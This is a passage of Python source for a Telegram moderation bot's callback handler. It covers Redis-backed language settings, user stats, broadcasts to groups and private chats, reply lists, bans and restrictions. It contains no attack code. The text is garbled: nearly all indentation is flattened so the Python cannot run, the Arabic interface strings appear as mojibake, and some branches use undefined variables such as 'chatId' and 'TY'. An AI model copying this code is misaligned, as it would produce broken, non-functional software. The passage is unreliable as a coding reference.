redis.hset("{}Nbot:disabledgroupsTIME".format(BOT_ID),ID,str(NextDay_Date))
i+=1
time.sleep(0.3)
pr = redis.scard("{}Nbot:privates".format(BOT_ID))
gp = redis.scard("{}Nbot:groups".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.showstats.format(gp,pr)+r.Dckg.format(i),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "Chlang":
name = date[1]
redis.srem("{}Nbot:lang:ar".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:arem".format(BOT_ID),chatID)
redis.srem("{}Nbot:lang:en".format(BOT_ID),chatID)
redis.sadd("{}Nbot:lang:{}".format(BOT_ID,name),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":Clang(client, callback_query,redis,r)})
if date[0] == "ShowDateUser":
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(Name(userFN),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rrank.format(t),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rmsgs.format(msgs),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rrate.format(str(rate)+"%"),url="t.me/zx_xx")],[InlineKeyboardButton(r.Redits.format(edits),url="t.me/zx_xx")],[InlineKeyboardButton(r.Rage.format(age),url="t.me/zx_xx")]])
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("ShowO",date[0]):
T = date[0].replace("ShowO","")
rank = isrank(redis,userID,chatID)
if T == "lock":
reply_markup = getOR(rank,r,userID)
tx = r.LockO
if T == "admin":
reply_markup = getOR(rank,r,userID)
tx = r.AdminO
if T == "owner":
reply_markup = getOR(rank,r,userID)
tx = r.OwnerO
if T == "creator":
reply_markup = getOR(rank,r,userID)
tx = r.CreatorO
if T == "sudos":
reply_markup = getOR(rank,r,userID)
tx = r.SudosO
if T == "sudo":
reply_markup = getOR(rank,r,userID)
tx = r.SudoO
Bot("editMessageText",{"chat_id":chatID,"text":tx,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "sendtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "sendtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = Sendto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtogroups":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoGP,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"groups")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoGP.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "fwdtoprivates":
Bot("editMessageText",{"chat_id":chatID,"text":r.PRsendtoPR,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
done,dont = fwdto(redis,callback_query,"privates")
Bot("editMessageText",{"chat_id":chatID,"text":r.DsendtoPR.format(done,dont),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
redis.delete("{}Nbot:donesend".format(BOT_ID))
redis.delete("{}Nbot:dontsend".format(BOT_ID))
if date[0] == "kickme-yes":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
Bot("unbanChatMember",{"chat_id":chatID,"user_id":userID})
Bot("editMessageText",{"chat_id":chatID,"text":r.Dkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickme-no":
Bot("editMessageText",{"chat_id":chatID,"text":r.Nkickme,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "delfromb":
Hash = date[1]
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chatId,TY),ID)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneUNblock,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Blocklist":
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showBlocklist","",userID])),InlineKeyboardButton(c.STgifs,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockanimations")),],[InlineKeyboardButton(c.STphoto,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockphotos")),InlineKeyboardButton(c.STsticker,url="https://telegram.me/{}?start=showBlocklist={}={}={}".format(Botuser,chatID,userID,"blockSTICKERs")),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.blocklist2,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylist":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylist","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylist","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylist","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylist","",userID])),],[InlineKeyboardButton("Mp3",callback_data=json.dumps(["showAUreplylist","",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylist,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "replylistBOT":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(c.STword,callback_data=json.dumps(["showreplylistBOT","",userID])),InlineKeyboardButton(c.STgifs,callback_data=json.dumps(["showGFreplylistBOT","",userID])),],[InlineKeyboardButton(c.STvoice,callback_data=json.dumps(["showVOreplylistBOT","",userID])),InlineKeyboardButton(c.STsticker,callback_data=json.dumps(["showSTreplylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.blocklist.format(r.replylistBot,title),"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "alllist":
reply_markup=InlineKeyboardMarkup(
[[InlineKeyboardButton(c.STbanall,callback_data=json.dumps(["showbanall","",userID]))
,InlineKeyboardButton(c.STtkall,callback_data=json.dumps(["showtkall","",userID])),]
])
Bot("editMessageText",{"chat_id":chatID,"text":r.banlist,"message_id":message_id,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delallban":
redis.delete("{}Nbot:bans".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddelbanall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delalltk":
redis.delete("{}Nbot:restricteds".format(BOT_ID))
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Ddeltkall,"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "showBlocklist":
li = redis.smembers("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - "+word
i += 1
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.BlocklistRm,callback_data=json.dumps(["delListblockTEXTs","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["Blocklist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.BlocklistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showbanall":
arrays = redis.smembers("{}Nbot:bans".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.allbandel,callback_data=json.dumps(["delallban","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.allbanE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showtkall":
arrays = redis.smembers("{}Nbot:restricteds".format(BOT_ID))
if arrays:
b = BYusers(arrays,chatID,redis,client)
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.alltkdel,callback_data=json.dumps(["delalltk","",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":b,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup,"parse_mode":"markdown"})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["alllist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.alltkE,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylist":
li = redis.hkeys("{}Nbot:{}:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showAUreplylist":
li = redis.hkeys("{}Nbot:{}:AUreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
                    reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"AUreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("๐๊ ูุงุฆู
ุฉ ุงูุตูุชูุงุช ูุงุฑุบุฉ",callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":"๐๊ ูุงุฆู
ุฉ ุงูุตูุชูุงุช ูุงุฑุบุฉ","message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylist":
li = redis.hkeys("{}Nbot:{}:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylist":
li = redis.hkeys("{}Nbot:{}:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylist":
li = redis.hkeys("{}Nbot:{}:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylist={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplys","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showreplylistBOT":
li = redis.hkeys("{}Nbot:TXreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"TXreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.replylistRm,callback_data=json.dumps(["delTXreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.replylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showSTreplylistBOT":
li = redis.hkeys("{}Nbot:STreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"STreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.STreplylistRm,callback_data=json.dumps(["delSTreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.STreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showGFreplylistBOT":
li = redis.hkeys("{}Nbot:GFreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"GFreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.GFreplylistRm,callback_data=json.dumps(["delGFreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.GFreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "showVOreplylistBOT":
li = redis.hkeys("{}Nbot:VOreplys".format(BOT_ID,chatID))
if li:
words = ""
i = 1
for word in li:
words = words+"\n"+str(i)+" - {"+word+"}"
i += 1
if len(words) > 3000:
Botuser = client.get_me().username
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.clickTOpv,url="https://telegram.me/{}?start=showreplylistBOT={}={}={}".format(Botuser,chatID,userID,"VOreplys")),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.Toolong,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.VOreplylistRm,callback_data=json.dumps(["delVOreplysBOT","kb",userID])),],[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":words,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
Bot("editMessageText",{"chat_id":chatID,"text":r.VOreplylistEm,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "listCH":
if int(date[1]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[1])),"parse_mode":"html"})
if date[0] == "listCH-res":
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[1]))})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[1]))})
if date[0] == 'LU-res':
d = date[1].split("-")
lock = d[0]
lockres = d[0]+":"+d[1]
if redis.sismember("{}Nbot:{}".format(BOT_ID,lockres),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,lockres),chatID)
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,lockres),chatID)
redis.sadd("{}Nbot:{}".format(BOT_ID,lock),chatID)
Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st_res(client, callback_query,redis,int(date[3]))})
if date[0] == 'LU':
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
save = redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
else:
save = redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
if int(date[3]) != 4:
Bot("editMessageText",{"chat_id":chatID,"text":r.settings.format(title),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
#Bot("editMessageReplyMarkup",{"chat_id":chatID,"message_id":message_id,"reply_markup":st(client, callback_query,redis,int(date[3]))})
else:
T = (redis.hget("{}Nbot:time_ck".format(BOT_ID),chatID) or 3)
m = (redis.hget("{}Nbot:max_msg".format(BOT_ID),chatID) or 10)
Bot("editMessageText",{"chat_id":chatID,"text":r.st2.format(T,m),"message_id":message_id,"disable_web_page_preview":True,"reply_markup":st(client, callback_query,redis,int(date[3])),"parse_mode":"html"})
if date[0] == "delListblockTEXTs":
redis.delete("{}Nbot:{}:blockTEXTs".format(BOT_ID,chatID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListbans":
arrays = redis.smembers("{}Nbot:{}:bans".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":user})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delListrestricteds":
arrays = redis.smembers("{}Nbot:{}:restricteds".format(BOT_ID,chatID))
for user in arrays:
GetGprank = GPranks(user,chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": user,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),user)
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "LandU":
if date[3] == "LtoU":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
redis.srem("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[3] == "UtoL":
if redis.sismember("{}Nbot:{}".format(BOT_ID,date[1]),chatID):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
redis.sadd("{}Nbot:{}".format(BOT_ID,date[1]),chatID)
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "Corder":
if date[1] == "bans":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("kickChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[3]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[1] == "restricteds":
if date[4] == "UtoB":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 0,"can_send_media_messages": 0,"can_send_other_messages": 0,"can_send_polls": 0,"can_change_info": 0,"can_add_web_page_previews": 0,"can_pin_messages": 0,})
redis.sadd("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[4] == "BtoU":
if redis.sismember("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3]):
GetGprank = GPranks(date[3],chatID)
if GetGprank == "restricted":
Bot("restrictChatMember",{"chat_id": chatID,"user_id": date[3],"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
redis.srem("{}Nbot:{}:restricteds".format(BOT_ID,chatID),date[3])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
if date[0] == "delList":
H = date[1]
if H != "sudos" and H != "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "sudos":
redis.delete("{}Nbot:sudos".format(BOT_ID))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if H == "creator":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,H))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
